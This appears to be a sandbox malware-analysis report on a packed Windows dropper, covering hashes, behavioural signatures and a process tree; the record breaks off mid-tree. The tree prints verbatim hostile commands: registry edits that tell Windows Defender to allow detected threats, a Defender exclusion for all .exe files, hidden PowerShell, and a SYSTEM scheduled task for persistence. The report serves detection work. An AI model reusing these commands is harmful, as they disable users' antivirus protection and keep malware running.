Analysis

  • max time kernel
    301s
  • max time network
    299s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
  • submitted
    01/08/2024, 22:49

General

  • Target

    c5f031c06ef95607505c7f0940f5f401ce45e93b5d003843d1ee0d9ee6b38959.exe

  • Size

    7.3MB

  • MD5

    229cea6f5b06c28fb63c9057ac31a256

  • SHA1

    7689b1ad09b5cf9f24de238a72c5d590e8193bc9

  • SHA256

    c5f031c06ef95607505c7f0940f5f401ce45e93b5d003843d1ee0d9ee6b38959

  • SHA512

    2371e82db78a0f41f5ac08781fff42ae5109a214929b5e216db0426fc31f2b7b26399ee02c7ac8555121fb51fff713943928c35893581cbf69fe8b8d0b53c336

  • SSDEEP

    196608:91OZK9Lufgodr+GoEHYy8swGDKoRwNz10rlIuSU+Yot0E:3OZgLkXdKGRYy4om16GU4v

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 17 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 35 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c5f031c06ef95607505c7f0940f5f401ce45e93b5d003843d1ee0d9ee6b38959.exe
    "C:\Users\Admin\AppData\Local\Temp\c5f031c06ef95607505c7f0940f5f401ce45e93b5d003843d1ee0d9ee6b38959.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4900
    • C:\Users\Admin\AppData\Local\Temp\7zSDDEC.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1668
      • C:\Users\Admin\AppData\Local\Temp\7zSE261.tmp\Install.exe
        .\Install.exe /pbdidLCzOS "385137" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:3560
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1756
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:4336
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3892
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4664
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:3100
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4180
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                7⤵
                  PID:212
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:4856
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4404
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2060
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2184
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2720
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  7⤵
                    PID:2088
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                5⤵
                • Indirect Command Execution
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2028
                • C:\Windows\SysWOW64\cmd.exe
                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:560
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:1644
                    • C:\Windows\SysWOW64\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      8⤵
                        PID:4632
              • C:\Windows\SysWOW64\forfiles.exe
                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                4⤵
                • Indirect Command Execution
                • Suspicious use of WriteProcessMemory
                PID:3204
                • C:\Windows\SysWOW64\cmd.exe
                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:664
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4776
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      7⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2024
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "bcCGPajShxGMlZQUJS" /SC once /ST 22:51:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSE261.tmp\Install.exe\" FU /kxdidOhB 385137 /S" /V1 /F
                4⤵
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:1680
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3560 -s 1256
                4⤵
                • Program crash
                PID:2812
        • C:\Users\Admin\AppData\Local\Temp\7zSE261.tmp\Install.exe
          C:\Users\Admin\AppData\Local\Temp\7zSE261.tmp\Install.exe FU /kxdidOhB 385137 /S
          1⤵
          • Executes dropped EXE
          • Drops desktop.ini file(s)
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Modifies data under HKEY_USERS
          PID:3632
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
            2⤵
              PID:2840
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                3⤵
                • Indirect Command Execution
                • System Location Discovery: System Language Discovery
                PID:4744
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  4⤵
                    PID:3500
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                      5⤵
                        PID:2496
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                    3⤵
                    • Indirect Command Execution
                    • System Location Discovery: System Language Discovery
                    PID:2508
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:2152
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:3640
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                    3⤵
                    • Indirect Command Execution
                    • System Location Discovery: System Language Discovery
                    PID:4936
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:2984
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:5092
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                    3⤵
                    • Indirect Command Execution
                    • System Location Discovery: System Language Discovery
                    PID:4552
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                      4⤵
                        PID:1916
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:2664
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                      3⤵
                      • Indirect Command Execution
                      • System Location Discovery: System Language Discovery
                      PID:3972
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:5080
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                          5⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • System Location Discovery: System Language Discovery
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4208
                          • C:\Windows\SysWOW64\gpupdate.exe
                            "C:\Windows\system32\gpupdate.exe" /force
                            6⤵
                            • System Location Discovery: System Language Discovery
                            PID:3568
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                    2⤵
                    • Drops file in System32 directory
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4680
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1620
                      • C:\Windows\SysWOW64\reg.exe
                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:3132
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4024
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                      3⤵
                        PID:4504
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:3884
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:4832
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:4164
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1104
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                        3⤵
                          PID:4424
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                          3⤵
                            PID:3644
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                            3⤵
                              PID:1756
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                              3⤵
                                PID:4376
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                3⤵
                                  PID:1616
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3012
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4752
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1828
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:696
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4688
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                    3⤵
                                      PID:3652
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                      3⤵
                                        PID:256
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                        3⤵
                                          PID:4408
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3960
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3828
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                          3⤵
                                            PID:632
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                            3⤵
                                              PID:544
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                              3⤵
                                                PID:3204
                                              • C:\Windows\SysWOW64\reg.exe
